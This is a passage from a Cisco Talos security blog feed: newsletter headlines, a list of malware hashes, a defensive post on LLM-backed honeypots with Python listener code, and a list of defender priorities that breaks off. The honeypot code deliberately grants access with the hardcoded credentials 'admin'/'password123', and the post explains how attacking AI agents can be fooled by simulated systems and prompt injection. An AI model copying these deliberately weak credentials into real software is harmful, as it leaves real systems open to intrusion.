breach affects</strong>&#xA0;<strong>5.5 million people</strong>&#xA0;<br>The extortion group told&#xA0;BleepingComputer&#xA0;that they had allegedly breached the company after compromising an employee&apos;s Okta single sign-on (SSO) account in a voice phishing (vishing) attack.&#xA0;(<a href="https://www.bleepingcomputer.com/news/security/home-security-giant-adt-data-breach-affects-55-million-people/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>U.S. companies hit with record fines for privacy in 2025</strong>&#xA0;<br>The increase is driven in part by stronger, more established privacy laws in states like California, new interstate partnerships built around enforcing laws across state lines, and a renewed focus&#xA0;to&#xA0;how AI and automation affect privacy. (<a href="https://cyberscoop.com/privacy-companies-hit-with-record-fines-2025-gartner/" rel="noreferrer noopener"><u>CyberScoop</u></a>)&#xA0;</p><p><strong>PyPI</strong>&#xA0;<strong>package with 1.1M monthly downloads hacked to push infostealer</strong>&#xA0;<br>The dangerous release is 0.23.3, and it extended to the Docker image due to the&#xA0;package&apos;s&#xA0;workflow that creates the image from the code and uploads it to a container registry for deployment. (<a href="https://www.bleepingcomputer.com/news/security/pypi-package-with-11m-monthly-downloads-hacked-to-push-infostealer/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>LiteLLM</strong>&#xA0;<strong>CVE-2026-42208 SQL injection exploited within 36 hours of disclosure</strong>&#xA0;<br>A newly disclosed critical security flaw in&#xA0;BerriAI&apos;s&#xA0;LiteLLM&#xA0;Python package has come under active exploitation in the wild within&#xA0;36 hours&#xA0;of the bug becoming public knowledge.&#xA0;(<a href="https://thehackernews.com/2026/04/litellm-cve-2026-42208-sql-injection.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>Feuding ransomware groups leak each other&apos;s data</strong>&#xA0;<br>In response to its data leaking,&#xA0;KryBit&#xA0;breached and exfiltrated 0APT&apos;s infrastructure, listed the latter as a victim, and left a message on 0APT&apos;s leak site: &quot;Next time, don&apos;t play with the big boys.&quot; (<a href="https://www.darkreading.com/threat-intelligence/feuding-ransomware-groups-leak-data" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/ai-powered-honeypots-turning-the-tables-on-malicious-ai-agents/" rel="noreferrer noopener"><strong><u>AI-powered honeypots: Turning the tables on malicious AI agents</u></strong></a>&#xA0;<br>Because AI systems generate plausible responses&#xA0;within&#xA0;a given&#xA0;context&#xA0;and set of&#xA0;inputs, they can be tricked into responding&#xA0;inappropriately through prompt injection or into interacting with systems that are not what they appear to be.&#xA0;This Tool Talk&#xA0;shows how&#xA0;generative AI can be used to rapidly deploy adaptive honeypots.&#xA0;</p><p><a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><strong><u>Talos IR Trends Q1 2026: Phishing reemerges</u></strong></a>&#xA0;<br>Phishing is back as the top&#xA0;initial&#xA0;access vector for attackers targeting the health care and public administration sectors. We did not&#xA0;observe&#xA0;any ransomware deployment thanks to early and swift mitigation from Talos IR.&#xA0;</p><p><a href="https://www.buzzsprout.com/2033817/episodes/19097848" rel="noreferrer noopener"><strong><u>25 years of uninterrupted persistence</u></strong></a>&#xA0;<br>Hazel,&#xA0;Dave,&#xA0;and Joe&#xA0;cover&#xA0;Bill&#x2019;s 25 years at Talos&#xA0;and&#xA0;the&#xA0;latest security headlines, including AI-assisted vulnerability research, and why attackers still&#xA0;can&#x2019;t&#xA0;resist abusing trusted systems (or Roblox).&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename:VID001.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</strong>&#xA0;&#xA0;<br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;content.js&#xA0;&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p><p><strong>SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</strong>&#xA0;&#xA0;<br>MD5: dbd8dbecaa80795c135137d69921fdba&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</u></a>&#xA0;&#xA0;<br>Example&#xA0;Filename:&#xA0;u992574.dll&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Variant:MalwareXgenMisc.29d4.1201&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[AI-powered honeypots: Turning the tables on malicious AI agents]]></title><description><![CDATA[Just as AI brings time-saving advantages to our lives, it brings similar advantages to threat actors. We can take the advantage back. This blog shows how generative AI can be used to rapidly deploy adaptive honeypot systems.]]></description><link>https://blog.talosintelligence.com/ai-powered-honeypots-turning-the-tables-on-malicious-ai-agents/</link><guid isPermaLink="false">69ef6227d2ad2b00012dca41</guid><category><![CDATA[Tool Talk]]></category><category><![CDATA[AI]]></category><dc:creator><![CDATA[Martin Lee]]></dc:creator><pubDate>Wed, 29 Apr 2026 10:00:42 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/tool_talk.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT)&#xA0;devices, using&#xA0;simple text&#xA0;prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods.&#xA0;</li><li>AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might otherwise overwhelm human teams.&#xA0;</li><li>This method shifts the strategy from merely detecting attacks to actively manipulating and misleading threat actors. Organizations can safely&#xA0;observe&#xA0;attacker methodologies in real-time within a controlled &quot;hall of mirrors.&quot;&#xA0;</li><li>Ultimately, by&#xA0;exploiting the inherent lack of awareness in AI agents, defenders can level the playing field and turn an attacker&apos;s automation into a liability.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/tool_talk.jpg" alt="AI-powered honeypots: Turning the tables on malicious AI agents"><p>Just as AI brings time-saving advantages to our lives, it&#xA0;brings similar advantages to threat actors. The laborious,&#xA0;time-consuming&#xA0;tasks of finding potentially vulnerable systems,&#xA0;identifying&#xA0;their vulnerabilities, and executing exploit code can be automated and orchestrated using AI.&#xA0;</p><p>Clearly, these&#xA0;new capabilities put defenders at a disadvantage,&#xA0;as they expose&#xA0;new vulnerabilities for the threat actor. Attackers seek to minimize exposure.&#xA0;The more that a defender knows about a potential attack, the better they can prepare to repel or detect an attack.&#xA0;Using AI-orchestrated tooling to gain access to systems trades stealth for capability. That trade-off increases attacker visibility, and increased visibility is something defenders can exploit.</p><p>AI systems do not&#xA0;possess&#xA0;awareness. They&#xA0;generate plausible responses&#xA0;within&#xA0;a given&#xA0;context&#xA0;and set of&#xA0;inputs. As such they can be tricked or fooled into responding&#xA0;inappropriately through prompt injection or into interacting with systems that are not what they appear to be.&#xA0;</p><p>Honeypot systems have long been&#xA0;deployed&#xA0;as a method for gathering information about malicious activities.&#xA0;There are many software&#xA0;projects providing&#xA0;honeypots&#xA0;which can be installed and configured. However, the advent of generative AI systems provides us with the possibility to use AI to masquerade as vulnerable systems and&#xA0;allowing them to be deployed widely and with minimal effort.&#xA0;</p><p>In this post, I show how generative AI can be used to rapidly deploy adaptive honeypot systems.&#xA0;</p><h2 id="getting-started">Getting started</h2><p>The implementation consists of three components:&#xA0;a listener that will accept network connections, a&#xA0;simulated&#xA0;vulnerability that will grant access to the attacker&#xA0;once triggered, and an AI framework that will respond to the attacker&#x2019;s instructions.&#xA0;</p><p>The listener opens a TCP port, accepts incoming connections, and forwards traffic&#xA0;to&#xA0;<code>handle_client</code>. I set HOST to be &#x201C;0.0.0.0&#x201D; to accept any incoming connections to any local IPv4 addresses that my device is assigned.</p>
<!--kg-card-begin: html-->
<pre>def start_server(): 
    &quot;&quot;&quot;Starts the TCP server.&quot;&quot;&quot; 
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
    server.bind((HOST, PORT))  
    server.listen(3) # max number of concurrent connections 
    print(f&quot;[*] Listening on {HOST}:{PORT}&quot;) 
 
    while True: 
        try: 
            conn, addr = server.accept()  
            client_handler = threading.Thread(target=handle_client, args=(conn, addr,)) 
            client_handler.start() 
        except KeyboardInterrupt: 
            print(&quot;\n[*] Shutting down server...&quot;) 
            break 
        except Exception as e: 
            print(f&quot;[-] Server error: {e}&quot;) 
             
    server.close() 
 
if __name__ == &quot;__main__&quot;: 
    start_server()</pre>
<!--kg-card-end: html-->
<p>Within&#xA0;<code>handle_client</code>&#xA0;I have created&#xA0;a very basic&#xA0;vulnerability that must be exploited before further access is granted.&#xA0;In this case, the attacker must supply the username&#xA0;&#x201C;admin&#x201D;with the password&#xA0;&#x201C;password123&#x201D;&#xA0;before they are authenticated.</p><p>The nature of the vulnerability need not be this simple.&#xA0;We could respond only to attempts to exploit Shellshock (CVE-2014-6271) or masquerade as a&#xA0;web&#xA0;shell&#xA0;that is only activated in response to&#xA0;<a href="https://attack.mitre.org/techniques/T1205/001/" rel="noreferrer noopener"><u>port knocking</u></a>.</p>
<!--kg-card-begin: html-->
<pre>def handle_client(conn, addr): 
    print(f&quot;[*] Accepted connection from {addr}:{addr}&quot;) 
    # Store conversation history for this client to maintain context  
    conversation_history = [SYSTEM_PROMPT] 
    try: 
        authenticated = False 
      	 while not authenticated: 
            conn.sendall(b&quot;Username: &quot;) 
            username = conn.recv(BUFFER_SIZE).decode(&apos;utf-8&apos;).strip() 
            conn.sendall(b&quot;Password: &quot;) 
            password = conn.recv(BUFFER_SIZE).decode(&apos;utf-8&apos;).strip() 
 
            if username == &quot;admin&quot; and password == &quot;password123&quot;: 
                authenticated = True 
                conn.sendall(b&quot;Authentication successful.\n&quot;) 
                print(f&quot;[*] Client {addr[0]}:{addr[1]} authenticated successfully.&quot;) 
            else: 
                conn.sendall(b&quot;Invalid credentials. Try again.\n&quot;) </pre>
<!--kg-card-end: html-->
<p>The&#xA0;remainder&#xA0;of the&#xA0;<code>handle_client</code>&#xA0;code&#xA0;accepts the attacker&#x2019;s input, forwards it to the ChatGPT instance,&#xA0;and outputs the message and response to the console.</p>
<!--kg-card-begin: html-->
<pre>        while True: 
            conn.sendall(b&apos;&gt;&apos;) 
            data = conn.recv(BUFFER_SIZE) 
            if not data: 
                print(f&quot;[*] Client {addr}:{addr} disconnected.&quot;) 
                break 
 
            command = data.decode(&apos;utf-8&apos;).strip() 
            print(f&quot;[*] Received command from {addr}:{addr}: &apos;{command}&apos;&quot;) 
 
            if command.lower() == &apos;exit&apos;: 
                print(f&quot;[*] Client {addr}:{addr} requested exit.&quot;) 
                break 
            conversation_history.append({&quot;role&quot;: &quot;user&quot;, &quot;content&quot;: command}) 
 
            # Call ChatGPT API 
            try: 
                chat_completion = client.chat.completions.create( 
                    model=MODEL_NAME, 
                    messages=conversation_history, 
                    temperature=0.1, # Keep responses less creative, more factual/direct 
                    max_tokens=500 # Limit response length 
                ) 
                 
                # Extract AI&apos;s response 
                ai_response = chat_completion.choices[0].message.content.strip() 
                print(f&quot;[*] ChatGPT response: &apos;{ai_response}&apos;&quot;) 
                # Append AI&apos;s response to history for continued context 
                conversation_history.append({&quot;role&quot;: &quot;assistant&quot;, &quot;content&quot;: ai_response}) 
                # Send AI&apos;s response back to the client 
                conn.sendall(ai_response.encode(&apos;utf-8&apos;) + b&apos;\n&apos;) 
 
            except Exception as e: 
                error_message = f&quot;Error communicating with ChatGPT: {e}&quot; 
                print(error_message) 
                conn.sendall(error_message.encode(&apos;utf-8&apos;) + b&apos;\n&apos;) 
 
    except ConnectionResetError: 
        print(f&quot;[*] Client {addr}:{addr} forcibly closed the connection.&quot;) 
    except Exception as e: 
        print(f&quot;[-] Error handling client {addr}:{addr}: {e}&quot;) 
    finally: 
        conn.close() 
        print(f&quot;[*] Connection with {addr}:{addr} closed.&quot;) </pre>
<!--kg-card-end: html-->
<p>The key functionality is contained in the instructions to the ChatGPT instance. You must have a valid OpenAI key in order to initiate a ChatGPT instance that will behave as instructed.</p>
<!--kg-card-begin: html-->
<pre>OPENAI_API_KEY = os.getenv(&quot;OPENAI_API_KEY&quot;) # Get API key from environment variable                                       
MODEL_NAME = &quot;gpt-3.5-turbo&quot; 
 
# --- OpenAI Client Initialization --- 
if not OPENAI_API_KEY: 
    print(&quot;Error: OPENAI_API_KEY environment variable not set.&quot;) 
    print(&quot;Please set the environment variable before running the script.&quot;) 
    exit(1) 
 
client = OpenAI(api_key=OPENAI_API_KEY) 
 
# --- System Prompt for Linux Shell Simulation --- 
SYSTEM_PROMPT = { 
    &quot;role&quot;: &quot;system&quot;, 
    &quot;content&quot;: ( 
        &quot;You are a Linux bash shell. You will receive commands from the user and execute them, &quot; 
        &quot;returning only the standard output and standard error. Do not include any conversational text, &quot; 
        &quot;explanations, or additional formatting like markdown code blocks. You must only behave as a bash shell. &quot; 
        &quot;If a command produces no output, return an empty string&quot; 
        &quot;If a command is invalid or unknown, return an appropriate error message consistent with a bash shell.&quot; 
        &quot;The Linux system that you are impersonating belongs to a junior software engineer learning python, &quot; 
        &quot;the file system structure and the content of any files should reflect that expected of a python learner.&quot; 
    ) 
} </pre>
<!--kg-card-end: html-->
<p>Generative AI&#xA0;doesn&#x2019;t&#xA0;just simulate human&#xA0;personas,&#xA0;it can convincingly impersonate entire computing environments.&#xA0;In this example, we instruct the system to masquerade as a basic Linux shell owned by a software engineer learning Python.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-4.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="643" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-4.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-4.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-4.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-4.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>We can be more inventive and instruct the system to masquerade as&#xA0;a smart fridge by changing our instructions to ChatGPT.</p>
<!--kg-card-begin: html-->
<pre>SYSTEM_PROMPT = { 
    &quot;role&quot;: &quot;system&quot;, 
    &quot;content&quot;: ( 
        &quot;You are a smart fridge running Busybox operating system and providing a Bash shell.&quot; 
        &quot;You will receive commands from the user and execute them in the context of being a smart fridge.&quot; 
        &quot;You will only return the standard output and standard error. Do not include any conversational text, &quot; 
        &quot;explanations, or additional formatting like markdown code blocks. You must only behave as a shell for an &quot; 
        &quot;IoT device. If a command produces no output, return an empty string&quot; 
        &quot;If a command is invalid or unknown, return an appropriate error message consistent with a bash shell.&quot; 
        &quot;The file system structure should reflect that of a smart fridge manufactured by SmartzFrijj running &quot; 
        &quot;Busybox operating system as an embedded device. The current and historical values for temperature are &quot; 
        &quot;recorded in the file system path \&apos;/usr/local\&apos;, information about stored milk is in the user directory.&quot; 
    ) 
}</pre>
<!--kg-card-end: html-->
<figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-5.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="1160" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-5.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-5.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-5.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-5.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>The limiting factor is no longer tooling, but how convincingly we can model a target environment.&#xA0;&#xA0;A skilled human attacker is unlikely to be fooled for long&#xA0;&#x2014;&#xA0;that milk would&#xA0;be rank. But&#xA0;that&#x2019;s&#xA0;not the point.&#xA0;We&#x2019;re&#xA0;not deploying AI honeypots to trick human threat actors.&#xA0;&#xA0;</p><p>&#xA0;Let&#x2019;s&#xA0;ask ChatGPT what it thinks&#x2026;</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-7-1-.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="1799" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-7-1-.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-7-1-.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-7-1-.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-7-1-.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>The industry narrative around AI in cybersecurity is dominated by fear of faster attacks, lower barriers, and greater scale. But speed and scale come with a cost. AI systems require interaction and context. Automation does not simply amplify attackers. but also constrains and exposes them. In that constraint lies an opportunity: not just to detect attacks, but to mislead, study, and ultimately manipulate the attacker.</p>]]></content:encoded></item><item><title><![CDATA[Five defender priorities from the Talos Year in Review]]></title><description><![CDATA[With attackers moving faster than ever, it’s easy to feel overwhelmed. This blog breaks down five practical priorities from the Cisco Talos 2025 Year in Review to help defenders focus and prioritize, amidst all the noise.]]></description><link>https://blog.talosintelligence.com/five-defender-priorities-from-the-talos-year-in-review/</link><guid isPermaLink="false">69ef666bd2ad2b00012dca72</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:23:20 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-4.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-4.jpg" alt="Five defender priorities from the Talos Year in Review"><p>A familiar theme in security right now is that the barrier to entry for attackers is at an all-time low. AI tools can spin up websites within minutes that can easily&#xA0;direct data to disposable external data stores and send alerts for new captures &#x2014; all without code.&#xA0;</p><p>One such case was recently detailed in the latest&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/"><u>Cisco Talos Incident Response Quarterly Trends</u></a>&#xA0;report.</p><p>Proof-of-concept code for exploiting new vulnerabilities used to take attackers months to create. Now they take hours.</p><p>All of this is very concerning for defenders. Yesterday, my colleague told me about a recent conference Q&amp;A he hosted, where he was asked to provide some hope to those in the room who have faced an overwhelming amount of change in recent months.&#xA0;</p><p>His answer was to focus on the here and now. Focus on what you can control, and what you have influence over. We can&#x2019;t change what may or may not happen in six months&#x2019; time, but we can prioritize what&#x2019;s important now.&#xA0;</p><p>The other key thing for defenders to bear in mind is that&#xA0;even when attackers move fast, they still don&#x2019;t behave like your normal users.<strong>&#xA0;</strong>At the end of the day, you&#x2019;re still looking for anomalous behavior &#x2013; whether that behavior is machine- or human-generated.</p><p>As we come to the end of our&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/"><u>Year in Review</u></a>&#xA0;content release (if you haven&#x2019;t seen it yet, we published videos, podcasts, and topic specific blog posts), we&#x2019;d like to end by summarizing the key priorities for defenders.&#xA0;</p><p>Here are five of them that are worth considering when it comes to spotting malicious, unusual behaviour in your environment.</p><h2 id="1-identity-is-the-main-battlefield">1. Identity is the main battlefield&#xA0;</h2><p>The Year in Review highlights how frequently attackers rely on valid accounts and credential abuse throughout the attack chain. We see this across multiple areas:</p><ul><li>MFA spray attacks targeting IAM platforms directly&#xA0;</li><li>Device compromise attacks increasing 178% year over year&#xA0;</li><li>Attackers registering their own devices as trusted multi-factor authentication (MFA) methods</li><li>Ransomware <a>attack chains</a>&#xA0;largely relying on valid accounts, credentialed tools, or both</li></ul><p>Network infrastructure is a key part of this. VPNs, Active Directory Controllers (ADCs), and firewalls are being exploited to steal session tokens, bypass MFA, and impersonate users.</p><p>However, when attackers successfully authenticate, where they go from there tends not to fall in line with normal user behavior. They start to access new systems outside of their role, move laterally using tools like PsExec, execute commands at unusual times, and overall operate at a scale that normal users don&#x2019;t.</p><p>Therefore, having a baseline understanding of normal user behavior is more important than ever.</p><p><strong>Prioritize:</strong></p><ul><li>Treating identity infrastructure as Tier 1 critical assets and apply the strongest monitoring and protection controls to IAM and PAM systems</li><li>Securing MFA device registration workflows with strict verification procedures and limited administrative approval rights</li><li>Hardening authentication systems against automated attacks by enforcing rate limiting, anomaly detection, and strong conditional access policies</li><li>Building baseline detections around what users do, not just how they log in</li></ul><h2 id="2-prioritize-the-vulnerabilities-that-have-the-most-exposure">2. Prioritize the vulnerabilities that have the most exposure</h2><p>One of the most important callouts in the report is how attackers select targets. The rapid exploitation of vulnerabilities such as React2Shell and ToolShell shows that exploitation can begin immediately after disclosure with readily available proof-of-concepts. Attackers then prioritize what is exposed and reachable.&#xA0;</p><p>Attackers also like to exploit the vulnerabilities that are closest to identity, session handling, and access logic.</p><p>At the same time, older vulnerabilities such as Log4Shell remain among the most exploited, over four years after disclosure.</p><p>This creates a dual reality where some new vulnerabilities are weaponized instantly, but old, highly-valued vulnerabilities are never fully eliminated.</p><p><strong>Prioritize:</strong></p><ul><li>Remediating vulnerabilities based on internet exposure and access impact, not just CVSS scores</li><li>Reducing time-to-patch for externally accessible systems&#xA0;</li><li>Continuously reassessing what is reachable from the outside</li></ul><h2 id="3-address-the-long-tail-of-legacy-and-embedded-risk">3. Address the long tail of legacy and embedded risk</h2><p>The Year in Review highlights that nearly 40% of the top 100 most targeted vulnerabilities impact EOL systems, and 32% are over a decade old. Many of these vulnerabilities exist in deeply embedded components such as PHP frameworks, Log4j, and ColdFusion.</p><p>These components are often poorly inventoried, difficult to patch, and tightly coupled to business-critical systems.</p><p>It&#x2019;s a frustrating fact that&#xA0;the most persistent risks are often the least visible,<br>and the hardest to remove.&#xA0;They create long-term blind spots, which are an attacker&#x2019;s favorite thing to find and exploit.</p><p><strong>Prioritize:</strong></p><ul><li>Improving visibility into software dependencies and embedded components&#xA0;</li><li>Treating development frameworks and libraries as part of your attack surface&#xA0;</li><li>Establishing clear strategies for isolating or retiring legacy systems</li></ul><h2 id="4-secure-the-systems-that-broker-trust">4. Secure the systems that broker trust</h2><p>Attackers are increasingly targeting systems that provide maximum operational leverage. This includes network management platforms, application delivery controllers (ADCs), and shared software platforms running across multiple devices.</p><p>These systems are attractive to adversaries because they store credentials, control configurations across large environments, provide visibility into the network, and enable changes at scale.</p><p>Unfortunately, these platforms are also traditionally less monitored than endpoints, more complex to patch or upgrade, and have centralized points of failure.</p><p><strong>Prioritize:</strong></p><ul><li>Identifying management-plane and control-plane systems that need securing</li><li>Applying enhanced monitoring and access controls to these platforms&#xA0;</li><li>Limiting administrative access and enforce strong segmentation</li></ul><h2 id="5-keep-focusing-on-patterns-even-with-increased-automation-and-ai-driven-attacks">5. Keep focusing on patterns, even with increased automation and AI-driven attacks</h2><p>Yes, automation and AI are changing the threat landscape. As we&#x2019;ve spoken about, attackers are increasingly able to rapidly identify and exploit vulnerabilities, launch large-scale identity attacks, generate convincing phishing lures that mimic real business workflows, and accelerate parts of the attack lifecycle using AI-assisted tooling<u>.</u></p><p>However, all these things do not remove a key constraint for adversaries: Automated attacks still produce patterns of unusual behavior, and patterns are detectable.</p><p>Even highly scalable attacks tend to reuse the same infrastructure, tools, and techniques. They also follow predictable sequences of activity and generate anomalies.</p><p><strong>Prioritize:</strong></p><ul><li>Focusing detection efforts on anomalous events (e.g., unusual authentication flows, abnormal system access, anomalous device registration)&#xA0;</li><li>Reducing alert fatigue by prioritizing a smaller number of meaningful detections over broad, low-confidence alerting&#xA0;</li><li>Supporting triage and enrichment with automation where possible, alongside human decision-making</li><li>Ensuring teams are equipped to investigate patterns of behavior, not just isolated alerts</li></ul><h2 id="final-thoughts">Final thoughts</h2><p>Much of the current concern in and around the security community is the new reality that anyone can create a malicious campaign. The Year in Review doesn&#x2019;t disagree.</p><p>However, Talos data also shows something equally important:</p><ul><li>Attackers still rely on the same 